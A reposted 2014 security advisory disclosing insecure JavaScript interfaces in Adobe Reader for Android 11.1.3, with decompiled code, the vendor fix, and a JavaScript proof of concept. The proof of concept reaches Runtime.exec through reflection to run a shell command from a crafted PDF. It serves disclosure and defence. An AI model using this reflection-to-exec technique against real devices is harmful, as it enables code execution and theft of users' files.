首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Adobe Reader For Android Javascript Insecure
来源:http://www.securify.nl 作者:Koster 发布时间:2014-04-15   
------------------------------------------------------------------------
Adobe Reader for Android exposes insecure Javascript interfaces
------------------------------------------------------------------------
Yorick Koster, April 2014

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
Adobe Reader for Android [2] exposes several insecure Javascript
interfaces. This issue can be exploited by opening a malicious PDF in
Adobe Reader. Exploiting this issue allows for the execution of
arbitrary Java code, which can result in a compromise of the documents
stored in Reader and files stored on SD card.

------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was successfully verified on Adobe Reader for Android
version 11.1.3.

------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
Adobe released version 11.2.0 of Adobe Reader that add
@JavascriptInterface [3] annotations to public methods that should be
exposed in the Javascript interfaces. In addition, the app now targets
API Level 17 and contains a static method
(shouldInitializeJavaScript()) that is used to check the device's
Android version.

http://www.securify.nl/advisory/SFY20140401/reader_11.2.0_release_notes.png
Figure 1: Adobe Reader for Android 11.2.0 release notes

------------------------------------------------------------------------
Introduction
------------------------------------------------------------------------
Adobe Reader for Android allows users to work with PDF documents on an
Android tablet or phone. According to Google Play, the app is installed
on 100 million to 500 million devices.

The following classes expose one or more Javascript interfaces:

- ARJavaScript
- ARCloudPrintActivity
- ARCreatePDFWebView

The app targets API Level 10, which renders the exposed Javascript
interfaces vulnerable to code execution - provided that an attacker
manages to run malicious Javascript code within Adobe Reader.

------------------------------------------------------------------------
PDF Javascript APIs
------------------------------------------------------------------------
It appears that Adobe Reader for Mobile supports [4] a subset of the
Javascript for Acrobat APIs. For some reason the exposed Javscript
objects are prefixed with an underscore character.

public class ARJavaScript
{
[...]

     public ARJavaScript(ARViewerActivity paramARViewerActivity)
     {
[...]
         this.mWebView.addJavascriptInterface(new 
ARJavaScriptInterface(this),
"_adobereader");
         this.mWebView.addJavascriptInterface(new
ARJavaScriptApp(this.mContext), "_app");
         this.mWebView.addJavascriptInterface(new ARJavaScriptDoc(), 
"_doc");
         this.mWebView.addJavascriptInterface(new
ARJavaScriptEScriptString(this.mContext), "_escriptString");
         this.mWebView.addJavascriptInterface(new ARJavaScriptEvent(),
"_event");
         this.mWebView.addJavascriptInterface(new ARJavaScriptField(),
"_field");
         this.mWebView.setWebViewClient(new ARJavaScript.1(this));
this.mWebView.loadUrl("file:///android_asset/javascript/index.html");
     }

An attacker can create a specially crafted PDF file containing
Javascript that runs when the target user views (or interacts with)
this PDF file. Using any of the Javascript objects listed above
provides the attacker access to the public Reflection APIs inherited
from Object. These APIs can be abused to run arbitrary Java code.

------------------------------------------------------------------------
Proof of concept
------------------------------------------------------------------------
The following proof of concept [5] will create a text file in the app
sandbox.

function execute(bridge, cmd) {
     return bridge.getClass().forName('java.lang.Runtime')
         .getMethod('getRuntime',null).invoke(null,null).exec(cmd);
}

if(window._app) {
     try {
         var path = '/data/data/com.adobe.reader/mobilereader.poc.txt';
         execute(window._app, ['/system/bin/sh','-c','echo \"Lorem 
ipsum\" > '
+ path]);
         window._app.alert(path + ' created', 3);
     } catch(e) {
         window._app.alert(e, 0);
     }
}
------------------------------------------------------------------------
References
------------------------------------------------------------------------
[1] 
http://www.securify.nl/advisory/SFY20140401/adobe_reader_for_android_exposes_insecure_javascript_interfaces.html
[2] https://play.google.com/store/apps/details?id=com.adobe.reader
[3] 
http://developer.android.com/reference/android/webkit/JavascriptInterface.html
[4] 
http://www.adobe.com/devnet-docs/acrobatetk/tools/Mobile/js.html#supported-javascript-apis
[5] http://www.securify.nl/advisory/SFY20140401/mobilereader.poc.pdf

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·WhatsApp < v2.11.7 - Remote Cr
·PDF Album 1.7 Local File Inclu
·Internet Explorer 10 & Adobe F
·Unitrends Enterprise Backup 7.
·eScan Web Management Console C
·MS14-012 Microsoft Internet Ex
·Apple Mac OS X Lion Kernel xnu
·SAP Router Password Timing Att
·OpenSSL Heartbeat (Heartbleed)
·Jzip SEH Unicode Buffer Overfl
·Sophos Web Protection Applianc
·Ruby OpenSSL Private Key Spoof
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved